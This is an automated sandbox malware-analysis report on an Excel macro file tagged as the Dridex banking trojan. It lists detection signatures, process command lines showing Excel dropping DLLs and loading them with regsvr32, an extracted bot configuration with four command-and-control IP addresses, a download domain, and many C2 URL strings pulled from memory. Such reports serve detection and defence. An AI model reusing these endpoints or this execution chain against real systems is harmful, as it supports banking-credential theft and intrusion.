Play interactive tour

Edit tour

Analysis Report sample20210111-01.xlsm

Overview

General Information

Sample Name:	sample20210111-01.xlsm
Analysis ID:	338158
MD5:	fa5350d4304c4c2ceafa435244b5a5fc
SHA1:	fc8a20962b8cf86568b1e85be02ee9c7b62d94b2
SHA256:	0104974a7bf43e2e31d25ae485f57c62efe89eaea2d3e520db8a76fa70dd956d
Tags:	Dridexxlsm
Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Dridex e-Banking trojan

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: BlueMashroom DLL Load

System process connects to network (likely due to code injection or exploit)

Document contains an embedded VBA macro which may execute processes

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Machine Learning detection for dropped file

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Regsvr32 Anomaly

Allocates a big amount of memory (probably used for heap spraying)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to query network adapater information

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the installation date of Windows

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

EXCEL.EXE (PID: 6304 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)

regsvr32.exe (PID: 5544 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\mkmanoo.dll. MD5: 426E7499F6A7346F0410DEAD0805586B)

splwow64.exe (PID: 6712 cmdline: C:\Windows\splwow64.exe 12288 MD5: 8D59B31FF375059E3C32B17BF31A76D5)

regsvr32.exe (PID: 860 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\dunjzsby.dll. MD5: 426E7499F6A7346F0410DEAD0805586B)

regsvr32.exe (PID: 6384 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\xnaitann.dll. MD5: 426E7499F6A7346F0410DEAD0805586B)

cleanup

Malware Configuration

Threatname: Dridex

{"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 10444", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 4", "77.220.64.37:443", "80.86.91.27:3308", "5.100.228.233:3389", "46.105.131.65:1512"]}

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: BlueMashroom DLL Load

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\mkmanoo.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\mkmanoo.dll., CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6304, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\mkmanoo.dll., ProcessId: 5544

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\mkmanoo.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\mkmanoo.dll., CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6304, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\mkmanoo.dll., ProcessId: 5544

Sigma detected: Regsvr32 Anomaly

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 16.2.regsvr32.exe.b80000.3.unpack

Malware Configuration Extractor: Dridex {"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 10444", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 4", "77.220.64.37:443", "80.86.91.27:3308", "5.100.228.233:3389", "46.105.131.65:1512"]}

Multi AV Scanner detection for submitted file

Show sources

Source: sample20210111-01.xlsm	Virustotal: Detection: 26%			Perma Link
Source: sample20210111-01.xlsm	ReversingLabs: Detection: 32%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\xnaitann.dll	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\u8wa3gh[1].zip	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\dvnrlttv[1].zip	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\dunjzsby.dll	Joe Sandbox ML: detected

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Source: unknown	HTTPS traffic detected: 74.220.219.210:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.171.244.207:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.41.153:443 -> 192.168.2.4:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.4:49856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.4:49865 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\mkmanoo.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\dunjzsby.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\xnaitann.dll	Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: u8wa3gh[1].zip.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe

Source: excel.exe

Memory has grown: Private usage: 1MB later: 77MB

Source: global traffic

DNS query: name: bulksms.interweblimited.com

Source: global traffic

TCP traffic: 192.168.2.4:49746 -> 74.220.219.210:443

Source: global traffic

TCP traffic: 192.168.2.4:49746 -> 74.220.219.210:443

Source: global traffic	TCP traffic: 192.168.2.4:49775 -> 80.86.91.27:3308
Source: global traffic	TCP traffic: 192.168.2.4:49776 -> 5.100.228.233:3389
Source: global traffic	TCP traffic: 192.168.2.4:49777 -> 46.105.131.65:1512

Source: Joe Sandbox View	IP Address: 5.100.228.233 5.100.228.233
Source: Joe Sandbox View	IP Address: 80.86.91.27 80.86.91.27
Source: Joe Sandbox View	IP Address: 46.105.131.65 46.105.131.65
Source: Joe Sandbox View	IP Address: 77.220.64.37 77.220.64.37

Source: Joe Sandbox View	ASN Name: SENTIANL SENTIANL
Source: Joe Sandbox View	ASN Name: GD-EMEA-DC-SXB1DE GD-EMEA-DC-SXB1DE

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 16_2_00BB39F9 InternetReadFile,

Source: unknown

DNS traffic detected: queries for: bulksms.interweblimited.com

Source: regsvr32.exe, 00000010.00000003.872389085.0000000000866000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.914533725.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: regsvr32.exe, 00000010.00000003.872389085.0000000000866000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.914533725.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000010.00000003.888660438.0000000000845000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: regsvr32.exe, 00000010.00000002.982129885.000000000080A000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/
Source: regsvr32.exe, 00000010.00000003.872389085.0000000000866000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.914533725.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000010.00000003.872389085.0000000000866000.00000004.00000001.sdmp, regsvr32.exe, 00000010.00000003.811700017.000000000086D000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.914533725.00000000031A8000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.16.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000010.00000003.810278841.00000000008F2000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?95a542b1dd52e
Source: regsvr32.exe, 00000010.00000003.810278841.00000000008F2000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/p
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: regsvr32.exe, 00000010.00000002.1036478024.0000000004944000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.914533725.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://46.105.131.65/
Source: regsvr32.exe, 00000012.00000003.894507082.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://46.105.131.65/(
Source: regsvr32.exe, 00000010.00000003.872389085.0000000000866000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.914533725.00000000031A8000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.980149370.000000000319B000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.938801902.00000000031AE000.00000004.00000001.sdmp	String found in binary or memory: https://46.105.131.65:1512/
Source: regsvr32.exe, 00000012.00000003.886324610.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://46.105.131.65:1512/(
Source: regsvr32.exe, 00000010.00000002.982174522.0000000000866000.00000004.00000020.sdmp, regsvr32.exe, 00000012.00000003.917292709.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://46.105.131.65:1512/0
Source: regsvr32.exe, 00000012.00000003.980223979.000000000317D000.00000004.00000001.sdmp	String found in binary or memory: https://46.105.131.65:1512/6
Source: regsvr32.exe, 00000012.00000003.942509383.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://46.105.131.65:1512/8
Source: regsvr32.exe, 00000012.00000003.954288057.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://46.105.131.65:1512/;
Source: regsvr32.exe, 00000012.00000003.947193651.00000000031AF000.00000004.00000001.sdmp	String found in binary or memory: https://46.105.131.65:1512/D
Source: regsvr32.exe, 00000012.00000003.958125909.00000000031AD000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.898757958.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://46.105.131.65:1512/ES
Source: regsvr32.exe, 00000012.00000003.936022022.00000000031AF000.00000004.00000001.sdmp	String found in binary or memory: https://46.105.131.65:1512/H
Source: regsvr32.exe, 00000012.00000003.886324610.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://46.105.131.65:1512/P
Source: regsvr32.exe, 00000012.00000003.966072159.00000000031A7000.00000004.00000001.sdmp	String found in binary or memory: https://46.105.131.65:1512/h
Source: regsvr32.exe, 00000010.00000003.872389085.0000000000866000.00000004.00000001.sdmp	String found in binary or memory: https://46.105.131.65:1512/h:
Source: regsvr32.exe, 00000012.00000003.972854437.000000000317D000.00000004.00000001.sdmp	String found in binary or memory: https://46.105.131.65:1512/la
Source: regsvr32.exe, 00000012.00000003.972854437.000000000317D000.00000004.00000001.sdmp	String found in binary or memory: https://46.105.131.65:1512/m
Source: regsvr32.exe, 00000012.00000003.947193651.00000000031AF000.00000004.00000001.sdmp	String found in binary or memory: https://46.105.131.65:1512/oft
Source: regsvr32.exe, 00000012.00000003.980149370.000000000319B000.00000004.00000001.sdmp	String found in binary or memory: https://46.105.131.65:1512/p
Source: regsvr32.exe, 00000010.00000003.872389085.0000000000866000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.942509383.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://46.105.131.65:1512/soft
Source: regsvr32.exe, 00000012.00000003.886324610.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://46.105.131.65:1512/x
Source: regsvr32.exe, 00000012.00000003.980149370.000000000319B000.00000004.00000001.sdmp	String found in binary or memory: https://5..105.131.65:1512/
Source: regsvr32.exe, 00000010.00000002.982201012.00000000008D5000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.914533725.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://5.100.228.233/
Source: regsvr32.exe, 00000012.00000003.914533725.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://5.100.228.233/w
Source: regsvr32.exe, 00000010.00000002.982129885.000000000080A000.00000004.00000020.sdmp, regsvr32.exe, 00000010.00000003.888626667.000000000086C000.00000004.00000001.sdmp, regsvr32.exe, 00000010.00000003.888613064.00000000008F2000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.914533725.00000000031A8000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.941475415.00000000031AD000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.968234770.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://5.100.228.233:3389/
Source: regsvr32.exe, 00000012.00000003.972870710.00000000031A3000.00000004.00000001.sdmp	String found in binary or memory: https://5.100.228.233:3389/(
Source: regsvr32.exe, 00000010.00000003.872389085.0000000000866000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.942509383.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://5.100.228.233:3389/0
Source: regsvr32.exe, 00000012.00000003.952484888.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://5.100.228.233:3389/8
Source: regsvr32.exe, 00000012.00000003.952484888.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://5.100.228.233:3389/D
Source: regsvr32.exe, 00000012.00000003.952484888.00000000031AD000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.978555876.00000000031A4000.00000004.00000001.sdmp	String found in binary or memory: https://5.100.228.233:3389/ES
Source: regsvr32.exe, 00000012.00000003.959829384.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://5.100.228.233:3389/H
Source: regsvr32.exe, 00000010.00000003.888626667.000000000086C000.00000004.00000001.sdmp	String found in binary or memory: https://5.100.228.233:3389/N
Source: regsvr32.exe, 00000012.00000003.922794583.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://5.100.228.233:3389/P
Source: regsvr32.exe, 00000012.00000003.968234770.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://5.100.228.233:3389/X
Source: regsvr32.exe, 00000010.00000002.982174522.0000000000866000.00000004.00000020.sdmp	String found in binary or memory: https://5.100.228.233:3389/Z
Source: regsvr32.exe, 00000012.00000003.930528102.00000000031AE000.00000004.00000001.sdmp	String found in binary or memory: https://5.100.228.233:3389/h
Source: regsvr32.exe, 00000012.00000003.978500644.000000000317D000.00000004.00000001.sdmp	String found in binary or memory: https://5.100.228.233:3389/la
Source: regsvr32.exe, 00000012.00000003.978500644.000000000317D000.00000004.00000001.sdmp	String found in binary or memory: https://5.100.228.233:3389/ll
Source: regsvr32.exe, 00000010.00000002.1036478024.0000000004944000.00000004.00000001.sdmp	String found in binary or memory: https://5.100.228.233:3389/lln
Source: regsvr32.exe, 00000010.00000003.872389085.0000000000866000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.894507082.00000000031A8000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.906838132.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://5.100.228.233:3389/oft
Source: regsvr32.exe, 00000010.00000002.1036478024.0000000004944000.00000004.00000001.sdmp	String found in binary or memory: https://5.100.228.233:3389/r
Source: regsvr32.exe, 00000010.00000002.982174522.0000000000866000.00000004.00000020.sdmp, regsvr32.exe, 00000012.00000003.958125909.00000000031AD000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.978555876.00000000031A4000.00000004.00000001.sdmp	String found in binary or memory: https://5.100.228.233:3389/soft
Source: regsvr32.exe, 00000012.00000003.959829384.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://5.100.228.233:3389/x
Source: regsvr32.exe, 00000012.00000003.972854437.000000000317D000.00000004.00000001.sdmp	String found in binary or memory: https://77.105.131.65:1512/
Source: regsvr32.exe, 00000010.00000002.982129885.000000000080A000.00000004.00000020.sdmp, regsvr32.exe, 00000010.00000002.982201012.00000000008D5000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.914533725.00000000031A8000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.898757958.00000000031AD000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.978520541.0000000003185000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.928596818.00000000031A7000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/
Source: regsvr32.exe, 00000012.00000003.898757958.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/(
Source: regsvr32.exe, 00000010.00000002.1036478024.0000000004944000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.914533725.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/.
Source: regsvr32.exe, 00000012.00000003.962535896.00000000031A5000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/.(
Source: regsvr32.exe, 00000012.00000003.917292709.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/.:
Source: regsvr32.exe, 00000010.00000002.1036478024.0000000004944000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/.W
Source: regsvr32.exe, 00000010.00000002.982201012.00000000008D5000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/00.228.233/
Source: regsvr32.exe, 00000010.00000002.982201012.00000000008D5000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/105.131.65/
Source: regsvr32.exe, 00000012.00000002.992729996.000000000317E000.00000004.00000020.sdmp	String found in binary or memory: https://77.220.64.37/105.131.65/pe
Source: regsvr32.exe, 00000012.00000003.906838132.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/3
Source: regsvr32.exe, 00000010.00000002.982201012.00000000008D5000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/3321935-2125563209-4053062332-1002
Source: regsvr32.exe, 00000010.00000002.982129885.000000000080A000.00000004.00000020.sdmp	String found in binary or memory: https://77.220.64.37/4
Source: regsvr32.exe, 00000012.00000002.992729996.000000000317E000.00000004.00000020.sdmp	String found in binary or memory: https://77.220.64.37/5
Source: regsvr32.exe, 00000010.00000002.982201012.00000000008D5000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/53321935-2125563209-4053062332-1002
Source: regsvr32.exe, 00000012.00000003.906838132.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/;
Source: regsvr32.exe, 00000012.00000003.898757958.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/?
Source: regsvr32.exe, 00000010.00000002.982129885.000000000080A000.00000004.00000020.sdmp	String found in binary or memory: https://77.220.64.37/B
Source: regsvr32.exe, 00000012.00000003.917292709.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/F
Source: regsvr32.exe, 00000010.00000002.982201012.00000000008D5000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/H
Source: regsvr32.exe, 00000012.00000003.917292709.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/O
Source: regsvr32.exe, 00000012.00000003.936022022.00000000031AF000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/S
Source: regsvr32.exe, 00000012.00000003.894507082.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/W
Source: regsvr32.exe, 00000012.00000003.917292709.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/X
Source: regsvr32.exe, 00000012.00000003.906838132.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/b
Source: regsvr32.exe, 00000012.00000003.917292709.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/c
Source: regsvr32.exe, 00000012.00000003.958125909.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/c=
Source: regsvr32.exe, 00000012.00000003.906838132.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/cW
Source: regsvr32.exe, 00000012.00000003.914533725.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/cb
Source: regsvr32.exe, 00000010.00000002.1036478024.0000000004944000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.917292709.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/e
Source: regsvr32.exe, 00000012.00000003.890960750.00000000031AC000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/l
Source: regsvr32.exe, 00000012.00000003.906838132.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/nd-point:
Source: regsvr32.exe, 00000012.00000003.898757958.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/nd-point:J
Source: regsvr32.exe, 00000012.00000003.958125909.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/si
Source: regsvr32.exe, 00000012.00000003.914533725.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/si(
Source: regsvr32.exe, 00000012.00000003.980149370.000000000319B000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/si3
Source: regsvr32.exe, 00000012.00000003.980149370.000000000319B000.00000004.00000001.sdmp	String found in binary or memory: https://77.220.64.37/si=
Source: regsvr32.exe, 00000012.00000003.978520541.0000000003185000.00000004.00000001.sdmp	String found in binary or memory: https://77.86.91.27:3308/
Source: regsvr32.exe, 00000012.00000002.992736371.0000000003185000.00000004.00000020.sdmp	String found in binary or memory: https://80.220.64.37/
Source: regsvr32.exe, 00000010.00000002.1036478024.0000000004944000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.884237810.00000000031AF000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27/
Source: regsvr32.exe, 00000012.00000003.914533725.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27/A
Source: regsvr32.exe, 00000012.00000003.884237810.00000000031AF000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27/s
Source: regsvr32.exe, 00000012.00000003.914533725.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27/~
Source: regsvr32.exe, 00000010.00000003.872389085.0000000000866000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.914533725.00000000031A8000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.958125909.00000000031AD000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.925027011.00000000031AE000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.903292509.00000000031AD000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.922794583.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308/
Source: regsvr32.exe, 00000012.00000003.925027011.00000000031AE000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308/(
Source: regsvr32.exe, 00000012.00000003.962590797.000000000317E000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308/-
Source: regsvr32.exe, 00000012.00000003.914533725.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308/.dll
